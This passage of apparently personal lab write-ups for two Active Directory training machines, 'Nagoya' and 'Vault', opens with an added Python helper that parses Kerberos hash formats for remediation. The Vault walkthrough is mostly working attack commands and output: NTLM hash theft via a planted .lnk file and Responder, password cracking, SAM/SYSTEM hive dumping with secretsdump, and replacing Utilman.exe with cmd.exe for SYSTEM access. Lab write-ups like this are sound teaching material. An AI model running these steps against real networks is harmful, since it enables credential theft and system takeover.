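As an added example (not part of the writeup or of Impacket), a small parser for the hashcat-format Kerberos hashes produced above by `GetNPUsers` (AS-REP) and `GetUserSPNs` (TGS-REP), which also reads the encryption type embedded in each hash: etype 23 is RC4-HMAC, the case cracked with mode 13100 above, while AES-only service accounts (etype 17/18) or gMSA accounts are the mitigation. The sample hash lines are constructed placeholders in the same layout as the real output, and the UAC helper checks the `UF_DONT_REQUIRE_PREAUTH` bit that `GetNPUsers` reports.

```python
"""Triage helper for the hashcat-format Kerberos hashes shown above.
Added example; not part of the writeup or of Impacket."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Kerberos encryption types as they appear after "$krb5tgs$" / "$krb5asrep$".
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}
# userAccountControl bit that makes an account AS-REP roastable
# (what GetNPUsers reports as UF_DONT_REQUIRE_PREAUTH).
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Impacket layouts (hex fields are lowercase):
#   RC4 TGS  : $krb5tgs$23$*user$REALM$spn*$checksum$edata
#   AES TGS  : $krb5tgs$17|18$user$REALM$*spn*$checksum$edata
#   RC4 ASREP: $krb5asrep$23$user@REALM:checksum$edata
_TGS_RC4 = re.compile(r"^\$krb5tgs\$(23)\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-f]{32})\$([0-9a-f]+)$")
_TGS_AES = re.compile(r"^\$krb5tgs\$(17|18)\$([^$]+)\$([^$]+)\$\*([^*]+)\*\$([0-9a-f]{24})\$([0-9a-f]+)$")
_ASREP = re.compile(r"^\$krb5asrep\$(23)\$([^@]+)@([^:]+):([0-9a-f]{32})\$([0-9a-f]+)$")


@dataclass
class KerbHash:
    kind: str            # "krb5tgs" (Kerberoast) or "krb5asrep" (AS-REP roast)
    etype: int
    account: str
    realm: str
    spn: Optional[str]   # None for AS-REP hashes

    @property
    def etype_name(self) -> str:
        return ETYPE_NAMES.get(self.etype, f"etype {self.etype}")

    @property
    def rc4(self) -> bool:
        # RC4 tickets are keyed directly from the account's NT hash, which is
        # what makes a wordlist run like the hashcat step above practical.
        return self.etype == 23


def parse_kerb_hash(line: str) -> KerbHash:
    line = line.strip()
    m = _TGS_RC4.match(line) or _TGS_AES.match(line)
    if m:
        return KerbHash("krb5tgs", int(m.group(1)), m.group(2), m.group(3), m.group(4))
    m = _ASREP.match(line)
    if m:
        return KerbHash("krb5asrep", int(m.group(1)), m.group(2), m.group(3), None)
    raise ValueError("unrecognised Kerberos hash line")


def preauth_required(user_account_control: int) -> bool:
    """True when the account is NOT AS-REP roastable (the normal, safe state)."""
    return not (user_account_control & UF_DONT_REQUIRE_PREAUTH)


def triage(lines: List[str]) -> Tuple[List[KerbHash], List[KerbHash]]:
    """Split parsed hashes into (rc4_exposed, aes_only) for remediation."""
    rc4, aes = [], []
    for line in lines:
        h = parse_kerb_hash(line)
        (rc4 if h.rc4 else aes).append(h)
    return rc4, aes


# Constructed sample lines in the real layout; the hex fields are filler.
SAMPLE_HASHES = [
    "$krb5tgs$23$*svc_helpdesk$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_helpdesk*$"
    + "ab" * 16 + "$" + "cd" * 32,
    "$krb5tgs$18$svc_mssql$NAGOYA-INDUSTRIES.COM$*MSSQL/nagoya.nagoya-industries.com*$"
    + "ab" * 12 + "$" + "cd" * 32,
    "$krb5asrep$23$demo.user@NAGOYA-INDUSTRIES.COM:" + "ab" * 16 + "$" + "cd" * 32,
]

if __name__ == "__main__":
    exposed, aes_only = triage(SAMPLE_HASHES)
    for h in exposed:
        print(f"[RC4] {h.kind:10} {h.account:14} {h.spn or '-'}  -> move to AES-only / gMSA")
    for h in aes_only:
        print(f"[AES] {h.kind:10} {h.account:14} {h.spn or '-'}  ({h.etype_name})")
    print("pre-auth required for UAC 0x10200:", preauth_required(0x10200))
```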
### 5. Login RPC as `svc_mssql`
```
┌──(chw㉿CHW)-[~/Nagoya]
└─$ rpcclient -U "nagoya-industries.com\\svc_mssql" 192.168.122.21
Password for [NAGOYA-INDUSTRIES.COM\svc_mssql]:
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[employees] rid:[0x451]
group:[helpdesk] rid:[0x466]
group:[developers] rid:[0x46a]
rpcclient $> querygroupmem 0x200
rid:[0x1f4] attr:[0x7]
```
> Domain Admins contains only Administrator
> svc_mssql is in Domain Users
> > Analyse the relationship between users and groups
>[!Important]
>- Domain Admins:
>`Administrator`
>- Domain Guests:
>`Guest`
>- Schema Admins:
>`Administrator`
>- Enterprise Admins:
>`Administrator`
>- employees:
>`(the person-named user accounts)`
>- helpdesk:
>`svc_helpdesk`, `Iain.White`, `Joanna.Wood`, `Bethan.Webster`
>- developers:
>`Elaine.Brady`, `Christopher.Lewis`, `Megan.Johnson`, `Damien.Chapman`, `Joanne.Lewis`
>[!Important]
>You can also use BloodHound directly:
>`bloodhound-python -u svc_mssql -p Service1 -d nagoya-industries.com -dc nagoya.nagoya-industries.com -ns 192.168.122.21 --dns-tcp --disable-autogc -c all`
### 6. Bloodhound
After importing the data, `svc_mssql` turns out to have `GenericAll` over `Domain Admins`, `Enterprise Admins` and `Account Operators`

Add ourselves to the Domain Admins group
```
┌──(chw㉿CHW)-[~/Nagoya]
└─$ cat /etc/hosts
192.168.122.21 nagoya.nagoya-industries.com
```
```
┌──(chw㉿CHW)-[~/Nagoya]
└─$ impacket-AddUserSPN nagoya-industries.com/svc_mssql:Service1 -dc-ip 192.168.122.21 --target-name "Domain Admins" --add-acl
impacket-AddUserSPN: command not found
```
>[!Note]
>Currently unsolved
# Vault

## Solution
### 1. Recon
#### 1.1 Nmap
```
┌──(chw㉿CHW)-[~/Vault]
└─$ nmap -sC -sV -p- 192.168.122.172
...
Host is up (0.10s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-25 11:16:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.vault.offsec
| Not valid before: 2025-03-24T11:09:48
|_Not valid after: 2025-09-23T11:09:48
|_ssl-date: 2025-03-25T11:17:31+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: VAULT
| NetBIOS_Domain_Name: VAULT
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: vault.offsec
| DNS_Computer_Name: DC.vault.offsec
| DNS_Tree_Name: vault.offsec
| Product_Version: 10.0.17763
|_ System_Time: 2025-03-25T11:16:52+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49799/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-25T11:16:52
|_ start_date: N/A
```
> DNS, RPC, SMB, Ldap, Kpass, WinRM
```
┌──(chw㉿CHW)-[~/Vault]
└─$ cat /etc/hosts
192.168.122.172 vault.offsec
192.168.122.172 DC.vault.offsec
```
#### 1.2 SMB
```
┌──(chw㉿CHW)-[~/Vault]
└─$ enum4linux -a 192.168.122.172
=========================================( Target Information )=========================================
Target ........... 192.168.122.172
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
...
```
> administrator, guest, krbtgt, domain admins, root, bin, none\
> No other information
```
┌──(chw㉿CHW)-[~/Vault]
└─$ smbclient -L //192.168.122.172/. -U "anonymous"
Password for [WORKGROUP\anonymous]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DocumentsShare Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.122.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```
> DocumentsShare is probably the point to leverage
```
┌──(chw㉿CHW)-[~/Vault]
└─$ crackmapexec smb 192.168.122.172 -u 'guest' -p '' --rid-brute
SMB 192.168.122.172 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB 192.168.122.172 445 DC [+] vault.offsec\guest:
SMB 192.168.122.172 445 DC [+] Brute forcing RIDs
SMB 192.168.122.172 445 DC 498: VAULT\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 192.168.122.172 445 DC 500: VAULT\Administrator (SidTypeUser)
SMB 192.168.122.172 445 DC 501: VAULT\Guest (SidTypeUser)
SMB 192.168.122.172 445 DC 502: VAULT\krbtgt (SidTypeUser)
SMB 192.168.122.172 445 DC 512: VAULT\Domain Admins (SidTypeGroup)
SMB 192.168.122.172 445 DC 513: VAULT\Domain Users (SidTypeGroup)
SMB 192.168.122.172 445 DC 514: VAULT\Domain Guests (SidTypeGroup)
SMB 192.168.122.172 445 DC 515: VAULT\Domain Computers (SidTypeGroup)
SMB 192.168.122.172 445 DC 516: VAULT\Domain Controllers (SidTypeGroup)
SMB 192.168.122.172 445 DC 517: VAULT\Cert Publishers (SidTypeAlias)
SMB 192.168.122.172 445 DC 518: VAULT\Schema Admins (SidTypeGroup)
SMB 192.168.122.172 445 DC 519: VAULT\Enterprise Admins (SidTypeGroup)
SMB 192.168.122.172 445 DC 520: VAULT\Group Policy Creator Owners (SidTypeGroup)
SMB 192.168.122.172 445 DC 521: VAULT\Read-only Domain Controllers (SidTypeGroup)
SMB 192.168.122.172 445 DC 522: VAULT\Cloneable Domain Controllers (SidTypeGroup)
SMB 192.168.122.172 445 DC 525: VAULT\Protected Users (SidTypeGroup)
SMB 192.168.122.172 445 DC 526: VAULT\Key Admins (SidTypeGroup)
SMB 192.168.122.172 445 DC 527: VAULT\Enterprise Key Admins (SidTypeGroup)
SMB 192.168.122.172 445 DC 553: VAULT\RAS and IAS Servers (SidTypeAlias)
SMB 192.168.122.172 445 DC 571: VAULT\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 192.168.122.172 445 DC 572: VAULT\Denied RODC Password Replication Group (SidTypeAlias)
SMB 192.168.122.172 445 DC 1000: VAULT\DC$ (SidTypeUser)
SMB 192.168.122.172 445 DC 1101: VAULT\DnsAdmins (SidTypeAlias)
SMB 192.168.122.172 445 DC 1102: VAULT\DnsUpdateProxy (SidTypeGroup)
SMB 192.168.122.172 445 DC 1103: VAULT\anirudh (SidTypeUser)
```
#### 1.3 RPC
```
┌──(chw㉿CHW)-[~/Vault]
└─$ rpcclient -U '' -N 192.168.122.172
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
┌──(chw㉿CHW)-[~/Vault]
└─$ rpcclient -U "" 192.168.122.172
> enumdomusers
Password for [WORKGROUP\]:
rpcclient $> ls
command not found: ls
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> getdompwinfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaquery
Domain Name: VAULT
Domain Sid: S-1-5-21-537427935-490066102-1511301751
rpcclient $>
```
> ACCESS_DENIED
#### 1.4 LDAP
```
┌──(chw㉿CHW)-[~/Vault]
└─$ ldapsearch -x -H ldap://192.168.122.172 -D '' -w '' -b "DC=vault,DC=offsec"
# extended LDIF
#
# LDAPv3
# base <DC=vault,DC=offsec> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
```
### 2. Ntlm-theft
Use the DocumentsShare folder on the SMB share
#### 2.1 Create a link with ntlm_theft
```
┌──(chw㉿CHW)-[~/Tools/ntlm_theft]
└─$ python3 ntlm_theft.py -g lnk -s 192.168.45.178 -f vault
Created: vault/vault.lnk (BROWSE TO FOLDER)
Generation Complete.
┌──(chw㉿CHW)-[~/Tools/ntlm_theft]
└─$ cp -r vault/ /home/chw/Vault
```
#### 2.2 Start responder
Start responder listening on the VPN interface
```
┌──(chw㉿CHW)-[~/Vault/vault]
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
```
#### 2.3 Upload the link via SMB
```
┌──(chw㉿CHW)-[~/Vault/vault]
└─$ smbclient //192.168.122.172/DocumentsShare -U "guest"
Password for [WORKGROUP\guest]:
smb: \> put vault.lnk
putting file vault.lnk as \vault.lnk (6.7 kb/s) (average 6.7 kb/s)
smb: \>
```
#### 2.4 Hash received
responder receives the NTLMv2 hash
```
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 192.168.122.172
[SMB] NTLMv2-SSP Username : VAULT\anirudh
[SMB] NTLMv2-SSP Hash : anirudh::VAULT:c5f2198475822af...
```
> Save it as `anirudh.hash`
### 3. Cracking with John
```
┌──(chw㉿CHW)-[~/Vault]
└─$ hashid 'anirudh::VAULT:c5f2198475822af...'
Analyzing 'anirudh::VAULT:c5f2198475822af...'
[+] NetNTLMv2 [Hashcat Mode: 5600]
┌──(chw㉿CHW)-[~/Vault]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt anirudh.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
SecureHM (anirudh)
1g 0:00:00:03 DONE (2025-03-25 08:19) 0.2923g/s 3103Kp/s 3103Kc/s 3103KC/s Seifer@14..Sarahmasri
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
```
> `anirudh`:`SecureHM`
### 4. Evil-WinRM
```
┌──(chw㉿CHW)-[~/Vault]
└─$ evil-winrm -i 192.168.122.172 -u anirudh -p SecureHM
Evil-WinRM shell v3.5
...
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
```
> SeBackupPrivilege
> >Logged in successfully
### ✅ Get User Flag
> The user flag is in `C:\Users\anirudh\Desktop`
We can go directly into `C:\Users\Administrator\Desktop`
```
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/25/2025 4:10 AM 34 proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
Access to the path 'C:\Users\Administrator\Desktop\proof.txt' is denied.
At line:1 char:1
+ type proof.txt
+ ~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator\Desktop\proof.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
```
> But there is no permission to open it
## Privilege Escalation
### 5. SeBackupPrivilege: Shadow Copy
```
*Evil-WinRM* PS C:\Users\anirudh\Desktop> reg save HKLM\SYSTEM system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\anirudh\Desktop> reg save HKLM\SAM sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\anirudh\Desktop> ls
Directory: C:\Users\anirudh\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/25/2025 6:03 AM 34 local.txt
-a---- 3/25/2025 6:34 AM 49152 sam
-a---- 3/25/2025 6:30 AM 16478208 system
*Evil-WinRM* PS C:\Users\anirudh\Desktop> download system
Info: Downloading C:\Users\anirudh\Desktop\system to system
Info: Download successful!
*Evil-WinRM* PS C:\Users\anirudh\Desktop> download sam
Info: Downloading C:\Users\anirudh\Desktop\sam to sam
Info: Download successful!
```
### 6. Using secretsdump
```
┌──(chw㉿CHW)-[~/Vault]
└─$ impacket-secretsdump -system system -sam sam LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:608339ddc8f434ac21945e026887dc36:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
┌──(chw㉿CHW)-[~/Vault]
└─$ evil-winrm -i 192.168.122.172 -u Administrator -H 608339ddc8f434ac21945e026887dc36
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
```
> The extracted hash belongs to a local user
> It does not work for logging in on the Domain Controller
### 7. SeRestorePrivilege: Utilman.exe Hijack
If we reboot or log off the machine and press Windows key + U on the login screen, the system launches Utilman.exe with SYSTEM privileges
`Utilman.exe` is the accessibility tool that can be launched from the Windows login screen
```
*Evil-WinRM* PS C:\Users\anirudh\Desktop> mv C:/Windows/System32/Utilman.exe C:/Windows/System32/Utilman.old
*Evil-WinRM* PS C:\Users\anirudh\Desktop> mv C:/Windows/System32/cmd.exe C:/Windows/System32/Utilman.exe
```
Start RDP and click the accessibility tool
```
┌──(chw㉿CHW)-[~/Vault]
└─$ rdesktop 192.168.122.172
```

### ✅ Get Root FLAG